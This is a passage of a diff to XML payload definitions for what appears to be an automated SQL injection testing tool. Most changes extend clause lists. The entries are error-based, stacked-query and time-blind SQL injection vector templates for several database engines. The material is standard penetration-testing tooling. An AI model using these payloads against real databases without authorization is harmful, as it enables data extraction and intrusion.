<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [INFERENCE]</vector> <vector>OR [INFERENCE]</vector>
<request> <request>
@@ -191,7 +192,7 @@ Tag: <test>
<stype>1</stype> <stype>1</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>OR NOT [INFERENCE]</vector> <vector>OR NOT [INFERENCE]</vector>
<request> <request>
@@ -212,7 +213,7 @@ Tag: <test>
<vector>AND [INFERENCE]</vector> <vector>AND [INFERENCE]</vector>
<request> <request>
<payload>AND [RANDNUM]=[RANDNUM]</payload> <payload>AND [RANDNUM]=[RANDNUM]</payload>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
</request> </request>
<response> <response>
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison> <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
@@ -229,7 +230,7 @@ Tag: <test>
<vector>OR [INFERENCE]</vector> <vector>OR [INFERENCE]</vector>
<request> <request>
<payload>OR [RANDNUM]=[RANDNUM]</payload> <payload>OR [RANDNUM]=[RANDNUM]</payload>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
</request> </request>
<response> <response>
<comparison>OR [RANDNUM]=[RANDNUM1]</comparison> <comparison>OR [RANDNUM]=[RANDNUM1]</comparison>
@@ -246,7 +247,7 @@ Tag: <test>
<vector>OR NOT [INFERENCE]</vector> <vector>OR NOT [INFERENCE]</vector>
<request> <request>
<payload>OR NOT [RANDNUM]=[RANDNUM]</payload> <payload>OR NOT [RANDNUM]=[RANDNUM]</payload>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
</request> </request>
<response> <response>
<comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison> <comparison>OR NOT [RANDNUM]=[RANDNUM1]</comparison>

72
xml/payloads/02_error_based.xml
View File

@@ -7,7 +7,7 @@
<stype>2</stype> <stype>2</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector> <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
<request> <request>
@@ -31,7 +31,7 @@
<stype>2</stype> <stype>2</stype>
<level>1</level> <level>1</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY --> <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where> <where>1</where>
<vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector> <vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
@@ -56,7 +56,7 @@
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector> <vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request> <request>
@@ -80,7 +80,7 @@
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY --> <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where> <where>1</where>
<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector> <vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
@@ -105,7 +105,7 @@
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector> <vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request> <request>
@@ -129,7 +129,7 @@
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY --> <!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
<where>1</where> <where>1</where>
<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector> <vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
@@ -154,7 +154,7 @@
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector> <vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request> <request>
@@ -174,7 +174,7 @@
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector> <vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request> <request>
@@ -194,7 +194,7 @@
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector> <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request> <request>
@@ -219,7 +219,7 @@
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector> <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request> <request>
@@ -243,7 +243,7 @@
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector> <vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request> <request>
@@ -268,7 +268,7 @@
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector> <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
<request> <request>
@@ -293,7 +293,7 @@
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector> <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
<request> <request>
@@ -313,7 +313,7 @@
<stype>2</stype> <stype>2</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector> <vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request> <request>
@@ -332,7 +332,7 @@
<stype>2</stype> <stype>2</stype>
<level>1</level> <level>1</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector> <vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request> <request>
@@ -351,7 +351,7 @@
<stype>2</stype> <stype>2</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector> <vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request> <request>
@@ -372,7 +372,7 @@
<stype>2</stype> <stype>2</stype>
<level>1</level> <level>1</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector> <vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request> <request>
@@ -393,7 +393,7 @@
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector> <vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request> <request>
@@ -414,7 +414,7 @@
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector> <vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request> <request>
@@ -435,7 +435,7 @@
<stype>2</stype> <stype>2</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector> <vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request> <request>
@@ -454,7 +454,7 @@
<stype>2</stype> <stype>2</stype>
<level>1</level> <level>1</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector> <vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
<request> <request>
@@ -473,7 +473,7 @@
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector> <vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request> <request>
@@ -493,7 +493,7 @@
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector> <vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request> <request>
@@ -513,7 +513,7 @@
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector> <vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request> <request>
@@ -532,7 +532,7 @@
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector> <vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request> <request>
@@ -551,7 +551,7 @@
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector> <vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request> <request>
@@ -570,7 +570,7 @@
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector> <vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request> <request>
@@ -589,7 +589,7 @@
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1</clause> <clause>1,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector> <vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request> <request>
@@ -608,7 +608,7 @@
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1</clause> <clause>1,9</clause>
<where>2</where> <where>2</where>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector> <vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request> <request>
@@ -655,7 +655,7 @@
<stype>2</stype> <stype>2</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector> <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
<request> <request>
@@ -679,7 +679,7 @@
<stype>2</stype> <stype>2</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector> <vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
<request> <request>
@@ -703,7 +703,7 @@
<stype>2</stype> <stype>2</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector> <vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
<request> <request>
@@ -727,7 +727,7 @@
<stype>2</stype> <stype>2</stype>
<level>5</level> <level>5</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector> <vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
<request> <request>
@@ -747,7 +747,7 @@
<stype>2</stype> <stype>2</stype>
<level>5</level> <level>5</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector> <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
<request> <request>
@@ -771,7 +771,7 @@
<stype>2</stype> <stype>2</stype>
<level>2</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector> <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request> <request>
@@ -790,7 +790,7 @@
<stype>2</stype> <stype>2</stype>
<level>5</level> <level>5</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector> <vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
<request> <request>

8
xml/payloads/04_stacked_queries.xml
View File

@@ -450,7 +450,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector> <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request> <request>
@@ -470,7 +470,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector> <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request> <request>
@@ -571,7 +571,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector> <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request> <request>
@@ -591,7 +591,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector> <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request> <request>

166
xml/payloads/05_time_blind.xml
View File

@@ -7,7 +7,7 @@
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
@@ -27,7 +27,7 @@
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
@@ -47,7 +47,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
@@ -68,7 +68,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
@@ -89,7 +89,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector> <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request> <request>
@@ -109,7 +109,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector> <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request> <request>
@@ -129,7 +129,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
